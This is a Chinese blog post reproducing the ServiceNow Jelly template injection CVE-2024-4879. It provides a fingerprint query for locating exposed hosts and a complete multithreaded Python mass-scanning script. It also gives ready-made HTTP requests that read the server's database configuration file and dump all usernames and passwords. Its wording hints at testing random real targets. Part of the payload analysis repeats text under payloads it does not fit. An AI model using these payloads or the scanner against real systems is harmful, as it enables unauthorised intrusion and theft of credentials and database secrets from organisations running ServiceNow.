【漏洞复现】ServiceNow UI Jelly模板注入(CVE-2024-4879)

        声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

ServiceNow是一家专注于提供企业级云计算服务的企业,其旗舰产品是基于云的服务管理解决方案,旨在协助各组织简化及自动化其业务流程。然而,该公司的Jelly模板和Glide表达式存在安全漏洞,这使得未经授权的攻击者有机会通过构建恶意请求来利用这些漏洞,进而实现远程代码的执行。

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索:web.body="ConditionalFocus.jsdbx"

2.使用poc批量扫描

# 导入所需库
import requests
import argparse
import threading
import queue
import os
from requests.exceptions import RequestException
from datetime import datetime
import urllib3
import signal
import sys

# 禁用安全警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# 定义颜色代码
dimmed_gray_color = '\033[90m'
honey_yellow_color = "\033[38;5;214m"
dim_yellow_color = '\033[33;1m'
cyan_color = '\033[96m'
green_color = '\033[92m'
red_color = '\033[31m'
light_orange_color = '\033[38;5;214m'
reset_color = '\033[0m'

# 显示横幅信息
def banner():
    print(f"""
{light_orange_color}                                                                      
  ______     _______     ____   ___ ____  _  _         _  _    ___ _____ ___  
 / ___\ \   / / ____|   |___ \ / _ \___ \| || |       | || |  ( _ )___  / _ \ 
| |    \ \ / /|  _| _____ __) | | | |__) ||| |_ _____||| |_ / _ \  / / (_) |
| |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____|__   _| (_) |/ / \__, |
 \____|  \_/  |_____|   |_____|\___/_____|  |_|          |_|  \___//_/    /_/ 
                               
{reset_color}-> Bulk scanning tool for ServiceNow CVE-2024-4879 vulnerability.{reset_color}
{reset_color}{dimmed_gray_color}-> By x.com/MohamedNab1l
{light_orange_color}-> Use Wisely.{reset_color}
""")

# 日志目录和文件路径
LOG_DIR = 'logs'
LOG_FILE = os.path.join(LOG_DIR, 'scan.log')

# 创建日志目录
def create_log_dir():
    if not os.path.exists(LOG_DIR):
        os.makedirs(LOG_DIR)
        print_message('info', f"Log directory created: {LOG_DIR}")

# 记录日志信息
def log_message(message):
    with open(LOG_FILE, 'a') as log_file:
        log_file.write(f"{datetime.now().strftime('%Y-%m-%d %H:%M:%S')} - {message}")

# 打印不同级别的消息
def print_message(level, message):
    if level == 'vulnerable':
        print(f"{cyan_color}[VLUN] {message}{reset_color}")
    if level == 'info':
        print(f"{dimmed_gray_color}[INFO] {message}{reset_color}")
    elif level == 'success':
        print(f"{green_color}[VLUN] {message}{reset_color}")
    elif level == 'warning':
        print(f"{honey_yellow_color}[WARNING] {message}{reset_color}")
    elif level == 'error':
        print(f"{red_color}[ERROR] {message}{reset_color}")
    log_message(message)

# 需要检查的路径,包含漏洞利用代码
paths_to_check = "/login.do?jvar_page_title=<style><j:jelly xmlns:j=\"jelly\" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*191);</g:evaluate></j:jelly></style>"

# 发起请求并获取响应内容
def make_request(url):
    try:
        response = requests.get(url, verify=False)
        if response.status_code == 200:
            return response.text
        else:
            return None
    except requests.RequestException as e:
        return None

# 测试目标URL是否受漏洞影响
def test_host(url):
    try:
        fullurl = f"{url}{paths_to_check}"
        body = make_request(fullurl)
        if body is not None and '>1337<' in body:
            print_message('vulnerable', f"Vulnerable: {url}")
            #print(body)
        else:
            print_message('warning', f"Not Vulnerable: {url}")
    except requests.RequestException as e:
        print_message('error', f"Timeout: {url}")

# 工作线程函数,从队列中取出URL并测试其是否受漏洞影响
def worker(queue):
    while not queue.empty():
        url = queue.get()
        print_message('info', f"Testing {url}")
        test_host(url)
        queue.task_done()

# 处理Ctrl+C信号,优雅退出程序
def signal_handler(sig, frame):
    print_message('error', 'You pressed Ctrl+C! Exiting gracefully.')
    sys.exit(0)

# 主函数,解析命令行参数并执行相应的操作
def main():
    signal.signal(signal.SIGINT, signal_handler)
    banner()
    parser = argparse.ArgumentParser(description='Bulk scanning tool for ServiceNow CVE-2024-4879.')
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('-u', '--url', help='Target URL (e.g., http://example.com)')
    group.add_argument('-f', '--file', help='File containing list of URLs (one per line)')

    args = parser.parse_args()

    create_log_dir()

    if args.url:
        print_message('info', f"Testing single target: {args.url}")
        test_host(args.url)
    elif args.file:
        with open(args.file, 'r') as f:
            urls = [line.strip() for line in f if line.strip()]
      
        print_message('info', f"Testing multiple targets from file: {args.file}")

        url_queue = queue.Queue()
        for url in urls:
            url_queue.put(url)

        threads = []
        for _ in range(10):
            t = threading.Thread(target=worker, args=(url_queue,))
            t.start()
            threads.append(t)

        for t in threads:
            t.join()

        print_message('info', "Scanning complete.")

if __name__ == '__main__':
    main()

cmd运行:python poc.py -f host.txt

 随机寻找的幸运儿

三、漏洞复现 

1.构造数据包

1.构造数据包:

GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(111*111);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1
Host:  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

 2.读取数据库配置

GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E%22 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

3.查看用户名密码

GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egr=new%20GlideRecord(%22sys_user%22);gr.query();s=%22%22;while(gr.next())s=s.concat(gr.user_name,%22%20:%20%22,gr.user_password,%22%3Cbr/%3E%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1
Host:  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

2.数据包分析 

1.构造数据包

1. 请求行:`GET /login.do?

请求参数jvar_page_title的值经过URL编码,解码后为:

<style><j:jelly xmlns:j="jelly" xmlns:g="glide"><g:evaluate>gs.addErrorMessage(111*111);</g:evaluate></j:jelly></style>

这里是一个典型的服务器端模板注入(SSTI)攻击。攻击者尝试通过篡改请求参数来注入恶意代码。具体来说:

  • <style>标签被用来插入恶意代码,这样做可能是为了利用CSS的作用域来执行JavaScript代码。
  • <j:jelly><g:evaluate>是Jelly模板引擎的标签,用于在服务器端执行Jelly脚本。
  • gs.addErrorMessage(111*111);是Jelly脚本的一部分,它执行了一个乘法运算并将结果添加到错误消息中。这里的乘法运算看起来是无害的,但这可能是为了测试注入是否成功。在更复杂的攻击中,攻击者可能会执行更有害的操作,如读取文件内容、执行系统命令等。

2.读取数据库配置

  1. 请求参数jvar_page_title的值经过URL编码,解码后为:

    <style><j:jelly xmlns:j="jelly:core" xmlns:g="glide"><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>

    这里是一个典型的服务器端模板注入(SSTI)攻击。

    • <style>标签被用来插入恶意代码,这样做可能是为了利用CSS的作用域来执行JavaScript代码。
    • <j:jelly><g:evaluate>是Jelly模板引擎的标签,用于在服务器端执行Jelly脚本。
    • z=new Packages.java.io.File("").getAbsolutePath();获取当前工作目录的绝对路径。
    • z=z.substring(0,z.lastIndexOf("/"));从绝对路径中移除最后一个斜杠及其后面的部分,得到父目录的路径。
    • u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();尝试打开位于父目录下名为co..nf/glide.db.properties的文件,并创建一个BufferedReader对象来读取文件内容。
    • s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");逐行读取文件内容,并将其拼接到字符串s中,每行之间用换行符分隔。
    • gs.addErrorMessage(s);将读取到的文件内容作为错误消息添加到系统中。这里的乘法运算看起来是无害的,但这可能是为了测试注入是否成功。在更复杂的攻击中,攻击者可能会执行更有害的操作,如读取文件内容、执行系统命令等。

3.查看用户名密码

  1. 请求参数jvar_page_title的值经过URL编码,解码后为:
  2. <style><j:jelly xmlns:j="jelly" xmlns:g="glide"><g:evaluate>gr=new GlideRecord("sys_user");gr.query();s="";while(gr.next())s=s.concat(gr.user_name, " : ",gr.user_password,"<br/>");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>
  3. 这里是一个典型的服务器端模板注入(SSTI)攻击。
  4. <style>标签被用来插入恶意代码,这样做可能是为了利用CSS的作用域来执行JavaScript代码。
  5. <j:jelly>和<g:evaluate>是Jelly模板引擎的标签,用于在服务器端执行Jelly脚本。
  6. gr=new GlideRecord("sys_user");创建一个名为sys_user的GlideRecord对象。
  7. gr.query();执行查询操作,获取所有用户记录。
  8. s="";while(gr.next())s=s.concat(gr.user_name, " : ",gr.user_password,"<br/>");遍历查询结果,并将用户名和密码拼接成一个字符串,每个用户的用户名和密码之间用冒号和换行符分隔。
  9. gs.addErrorMessage(s);将拼接好的字符串作为错误消息添加到系统中。这里的乘法运算看起来是无害的,但这可能是为了测试注入是否成功。在更复杂的攻击中,攻击者可能会执行更有害的操作,如读取文件内容、执行系统命令等。

3.结束跑路

1.构造数据包

2.构造数据包,读取数据库配置

3.查看用户名密码

每篇一言:要不断的移动像水一样,才不会变成死水一样,你要不断流动着!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

抓跟ミgragon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值